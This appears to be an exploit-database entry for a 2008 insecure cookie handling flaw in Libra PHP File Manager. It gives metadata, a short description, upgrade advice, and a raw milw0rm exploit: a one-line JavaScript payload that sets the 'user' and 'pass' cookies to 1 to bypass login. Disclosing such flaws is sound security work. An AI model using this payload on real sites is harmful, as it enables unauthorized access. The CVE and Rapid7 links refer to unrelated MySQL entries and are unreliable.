header-logo
Suggest Exploit
vendor:
Libra File Manager
by:
Stack
7.5
CVSS
HIGH
Insecure Cookie Handling
614
CWE
Product Name: Libra File Manager
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: CVE-2008-4456
CPE: a:libra:libra_file_manager
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1289/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0110/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1461/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/apple-osx-mysql-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-4456/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

Libra PHP File Manager Insecure Cookie Handling Vulnerability

Libra File Manager is vulnerable to an insecure cookie handling vulnerability. An attacker can exploit this vulnerability by setting the user and pass cookie values to 1. This will allow the attacker to bypass authentication and gain access to the application.

Mitigation:

Upgrade to the latest version of Libra File Manager.
Source

Exploit-DB raw data:

###############################################################################################
[+] Libra PHP File Manager Insecure Cookie Handling Vulnerability
[+] Discovered By Stack              
[+] Greetz : All my freind             
################################################################################################
---
exploit:
javascript:document.cookie = "user=1; path=/"; document.cookie = "pass=1; path=/";

# milw0rm.com [2008-09-26]

Navigation

Suggest Exploit

Services By CQR